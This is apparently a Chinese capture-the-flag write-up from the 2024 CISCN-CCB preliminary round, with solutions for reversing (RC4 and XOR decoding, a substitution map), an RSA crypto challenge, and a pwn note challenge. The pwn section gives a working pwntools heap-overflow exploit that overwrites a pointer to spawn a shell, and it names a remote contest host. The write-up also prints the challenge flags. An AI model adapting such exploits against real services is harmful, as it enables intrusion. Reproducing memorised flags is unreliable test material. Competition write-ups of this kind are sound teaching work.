2024ciscn-ccb初赛部分wp

Re

ezCsky

找到rc4和key

def rc4(data, key):
    S = list(range(256))
    j = 0
    out = []

    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    i = j = 0
    for char in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(char ^ S[(S[i] + S[j]) % 256])

    return out


data = bytes([0x96, 0x8F, 0xB8, 0x08, 0x5D, 0xA7, 0x68, 0x44, 0xF2, 0x64,
  0x92, 0x64, 0x42, 0x7A, 0x78, 0xE6, 0xEA, 0xC2, 0x78, 0xB8,
  0x63, 0x9E, 0x5B, 0x3D, 0xD9, 0x28, 0x3F, 0xC8, 0x73, 0x06,
  0xEE, 0x6B, 0x8D, 0x0C, 0x4B, 0xA3, 0x23, 0xAE, 0xCA, 0x40,
  0xED, 0xD1])
key = b'testkey'
decrypted = rc4(data, key)
print(decrypted)

得到的密文发现最后一位是125，第一位和f异或得到l，猜测是相邻异或，而且程序前面也有xor模块

a=[10, 13, 6, 28, 31, 84, 86, 83, 87, 81, 0, 3, 29, 20, 88, 86, 3, 25, 28, 0, 84, 3, 75, 20, 88, 7, 2, 73, 76, 2, 7, 1, 81, 12, 8, 0, 1, 0, 3, 0, 79, 125]
flag='f'
ch='f'
for i in range(len(a)-1):
    tmp=ord(ch)^a[i]
    flag+=chr(tmp)
    ch=chr(tmp)
print(flag)
#flag{d0f5b330-9a74-11ef-9afd-acde48001122}

dump

程序会解析输入参数

输入flag发现刚好对的上

经过测试猜测是单表代换，且00表示4

把大部分可见字符的映射都找出来

# s='2e34222f313632262c2d1e3021232425272829373520331f2b2a12180613151a160a10110214050708090b0c0d1b190417030f0e1c1d'
# for i in range(0,0xlen(s),0x2):
#     print(s[i],0xend="")
#     print(s[i+1],0xend=",0x")
a=[0x2e,0x34,0x22,0x2f,0x31,0x36,0x32,0x26,0x2c,0x2d,0x1e,0x30,0x21,0x23,0x24,0x25,0x27,0x28,0x29,0x37,0x35,0x20,0x33,0x1f,0x2b,0x2a,0x12,0x18,0x06,0x13,0x15,0x1a,0x16,0x0a,0x10,0x11,0x02,0x14,0x05,0x07,0x08,0x09,0x0b,0x0c,0x0d,0x1b,0x19,0x04,0x17,0x03,0x0f,0x0e,0x1c,0x1d,0x00,0x38,0x39,0x01]
s='qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM124{}='
print(len(s))
print(len(a))
a1=[0x23,0x29,0x1E,0x24,0x38,0x0E,0x15,0x20,0x37,0x0E,0x05,0x20,0x00,0x0E,0x37,0x12,0x1D,0x0F,0x24,0x01,0x01,0x39]
for i in range(len(a1)):
    print(s[a.index(a1[i])],end="")
    
#flag{MTczMDc4MzQ2Ng==}

Pwn

anote

https://ya1orin.github.io/posts/cbe4da55.html

查看保护

无法反编译菜单

发现后门函数

gift泄露堆地址

有堆溢出

函数调用需要经过两次地址读，两次取地址后直接getshell

from pwn import *
context(log_level='debug',arch='i386',os='linux')
filename='./note'

debug = 1
if debug:
    io = process(filename)
else:
    io = remote('39.107.73.132',34877)

def s(a) : io.send(a)
def sa(a, b) : io.sendafter(a, b)
def sl(a) : io.sendline(a)
def sla(a, b) : io.sendlineafter(a, b)
def r() : return io.recv()
def pr() : print(io.recv())
def ru(a) : return io.recvuntil(a)
def inter() : io.interactive()
def debug():
    gdb.attach(io)
def b(addr):    
    #bk="b *$rebase("+str(addr)+")"    
    bk='b *' + str(addr)    
    attach(io,bk)  
def get_addr():
    #return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    return u32(io.recv()[0:4])


def add():
    ru(b'Choice>>')
    sl(b'1')
def show(index):
    ru(b'Choice>>')
    sl(b'2')
    ru(b'index: ')
    sl(index)
def edit(index,size,payload):
    ru(b'Choice>>')
    sl(b'3')
    ru(b'index: ')
    sl(index)
    ru(b'len: ')
    sl(size)
    ru(b'content: ')
    sl(payload)

system = 0x80489ce

add()
add()
add()
add()
add()

ru(b'Choice>>')
sl(b'2')
ru(b'index: ')
sl(b'4')
ru(b'gift: ')
gift=io.recvline()
gift = gift.strip()
str = gift.decode('utf-8')
gift_int = int(str,16)
gift_int = gift_int+8

payload=b'a'*24+p32(gift_int)
edit(b'1',b'28',payload)
edit(b'4',b'4',p32(system))
edit(b'2',b'1',b'a')

inter()

Crypto

rasnd-2

from Crypto.Util.number import getPrime, bytes_to_long
from random import randint
import os

FLAG = os.getenv("FLAG").encode()
flag1 = FLAG[:15]
flag2 = FLAG[15:]

def crypto1():
    p = getPrime(1024)
    q = getPrime(1024)
    n = p * q
    e = 0x10001
    x1=randint(0,2**11)
    y1=randint(0,2**114)
    x2=randint(0,2**11)
    y2=randint(0,2**514)
    hint1=x1*p+y1*q-0x114
    hint2=x2*p+y2*q-0x514
    c = pow(bytes_to_long(flag1), e, n)
    print(n)
    print(c)
    print(hint1)
    print(hint2)


def crypto2():
    p = getPrime(1024)
    q = getPrime(1024)
    n = p * q
    e = 0x10001
    hint = pow(514*p - 114*q, n - p - q, n)
    c = pow(bytes_to_long(flag2),e,n)
    print(n)
    print(c)
    print(hint)
print("==================================================================")
crypto1()
print("==================================================================")
crypto2()
print("==================================================================")
==================================================================
26714373031565422475884702170543410883373766932797969939280017108800123630280453788616378655019907797321111510231223356874948261879543789404350524004468888206101183893553783912724380985843610867526595833197366734130545820436239872839652589346601722085131378640769423529086811124172931366238980772713375464558442159355269775101329989966189515569376297816482517053422913115432001741932739141823138624540815101536913889794642390866813927702475029110686952078530692644252976502169483149132207976114466199894323910052111367201536776408811236973236608134901114724266365223503175620708205259026706410636563563598898057786909
18858506514752992181380154921747008058551432073649358179756400934499734929302097177385112589545638411907187544107364140903835767319765333083263371380171393252284034199968302788035813879025587162178319401359969618990483649417087485156561735201401525887885578022049717026480327032286788738889262482959544912750982820940453807386818377755465477978307315597575247620998533718055915017425523414691659570184139579810707813137941428133321379443751166951391551543594842911886444134180462626200534122766826612914831934523911294746691771890773567919420040686512711305345502628357059345018604242583923374930982823519300498861640
1703011784973694423523066984917892124619751172220144100044171439741165827972687390194124492251819042874252053150043202421782626869660480593115676811212128468596849367155081033328244384876406655473674390204200669968111480368833514298396052119966333625037144526212890106844115852680816838761270006004920982100788509334477038784632813857002635218
8596233896763717102169465608296028563515760739865995489935176725834214423578223747479973270599042824129419113680720794797661942367252581426481246316950815033131044242281997122567448742644673474903897866662886581037133335517704055756596838356619756825253469733432939827965726694808136837419859121356935545730046078254006901859741103020585105901848211173408398897737180145151960784779409091748948609728701125179059580873942337600282247998167059927473965882018545884
==================================================================
16589591418165998974581826396786398930964677585495811776727961980933761422829735502353148344295573923286904134270437840953903058835839647755304524379802201214055337473450626274233655129393993402170849111556891293771331425620727538676892779730518697214030981259596934139791367918170334793203308313793877432632961965570796244678476654144496744143529230273615880581380427053580163718759461912665013484259971242478070197232015833303583839630233529678406449192276948304869831793199422773169924034486860859583248462580782763862788640533350445627327551313451358489108372802941755051199397457477170827875256791335279931822163
3493216727040563603182782528379980992856985367672705061437847758429330967495522030591464555965123991215415707741373551781505882160952702665400598213557438002105417986620056775684429778017927694129314364830399810114133029099512289718032317103775152997628020077046730276692573860628045483306212242357668089602247503892447592293405654694663877541319208584675706845250157767477676729786680662467437147092154919231870894123001829518759712475631380741564021398432758657752054575552932354155897193050199905632726139361666588240188296480829032211689007858038874564883755261054886137380859036520919514155990974745414052260391
738711933947319822947673544397020570805588025177977860210346384599836444962386731037122249298437342058548865629696263398136643393798229605137124995991851470790761577269526848178263795501303172468316859219648198031139444340434290922490343059376784633680231755992893833495307272749496959826984455403224845257667388721423164198610039775635522398580665978800318363980423481678985219561212776853383645384028341490465579340909534811109967923304778965393247025954945989704145828423228694680674422850911134777381837444273593086003338565398835125386790498932704847535695287327571603796733691600956198673926829061013653722889
==================================================================

crypto2中指数为n-p-q，尝试（514 * p - 114 * q），这样就能构造欧拉定理，（514 * p - 114 * q）hint在模n下互逆

from Crypto.Util.number import *
from gmpy2 import invert
from sympy import symbols,solve
from itertools import product
from math import gcd

n=26714373031565422475884702170543410883373766932797969939280017108800123630280453788616378655019907797321111510231223356874948261879543789404350524004468888206101183893553783912724380985843610867526595833197366734130545820436239872839652589346601722085131378640769423529086811124172931366238980772713375464558442159355269775101329989966189515569376297816482517053422913115432001741932739141823138624540815101536913889794642390866813927702475029110686952078530692644252976502169483149132207976114466199894323910052111367201536776408811236973236608134901114724266365223503175620708205259026706410636563563598898057786909
c=18858506514752992181380154921747008058551432073649358179756400934499734929302097177385112589545638411907187544107364140903835767319765333083263371380171393252284034199968302788035813879025587162178319401359969618990483649417087485156561735201401525887885578022049717026480327032286788738889262482959544912750982820940453807386818377755465477978307315597575247620998533718055915017425523414691659570184139579810707813137941428133321379443751166951391551543594842911886444134180462626200534122766826612914831934523911294746691771890773567919420040686512711305345502628357059345018604242583923374930982823519300498861640
hint1=1703011784973694423523066984917892124619751172220144100044171439741165827972687390194124492251819042874252053150043202421782626869660480593115676811212128468596849367155081033328244384876406655473674390204200669968111480368833514298396052119966333625037144526212890106844115852680816838761270006004920982100788509334477038784632813857002635218
hint2=8596233896763717102169465608296028563515760739865995489935176725834214423578223747479973270599042824129419113680720794797661942367252581426481246316950815033131044242281997122567448742644673474903897866662886581037133335517704055756596838356619756825253469733432939827965726694808136837419859121356935545730046078254006901859741103020585105901848211173408398897737180145151960784779409091748948609728701125179059580873942337600282247998167059927473965882018545884

for a, b in product(range(2**12), repeat=2):
    q = gcd(a * (hint1+0x114) - b * (hint2+0x514), n)
    if q != 1 and q < n:
        break

p = n // q
e = 0x10001
d = invert(e, (p-1)*(q-1))
m = pow(c, d, n)

flag1 = long_to_bytes(m)
print(flag1)

n2=16589591418165998974581826396786398930964677585495811776727961980933761422829735502353148344295573923286904134270437840953903058835839647755304524379802201214055337473450626274233655129393993402170849111556891293771331425620727538676892779730518697214030981259596934139791367918170334793203308313793877432632961965570796244678476654144496744143529230273615880581380427053580163718759461912665013484259971242478070197232015833303583839630233529678406449192276948304869831793199422773169924034486860859583248462580782763862788640533350445627327551313451358489108372802941755051199397457477170827875256791335279931822163
c2=3493216727040563603182782528379980992856985367672705061437847758429330967495522030591464555965123991215415707741373551781505882160952702665400598213557438002105417986620056775684429778017927694129314364830399810114133029099512289718032317103775152997628020077046730276692573860628045483306212242357668089602247503892447592293405654694663877541319208584675706845250157767477676729786680662467437147092154919231870894123001829518759712475631380741564021398432758657752054575552932354155897193050199905632726139361666588240188296480829032211689007858038874564883755261054886137380859036520919514155990974745414052260391
hint=738711933947319822947673544397020570805588025177977860210346384599836444962386731037122249298437342058548865629696263398136643393798229605137124995991851470790761577269526848178263795501303172468316859219648198031139444340434290922490343059376784633680231755992893833495307272749496959826984455403224845257667388721423164198610039775635522398580665978800318363980423481678985219561212776853383645384028341490465579340909534811109967923304778965393247025954945989704145828423228694680674422850911134777381837444273593086003338565398835125386790498932704847535695287327571603796733691600956198673926829061013653722889
e = 65537

x = inverse(hint, n2)

solver = Solver()

p = Int('p')
q = Int('q')

solver.add(514 * p - 114 * q == x)
solver.add(p * q == n2)

if solver.check() == sat:
    model = solver.model()
    p_val = model[p].as_long()
    q_val = model[q].as_long()

    d = inverse(0x10001, (p_val - 1) * (q_val - 1))
    m = pow(c2, d, n2)
    print(long_to_bytes(m))
#b'flag{bb38781f-f3f4-46c0-956b-e34809406e0c}'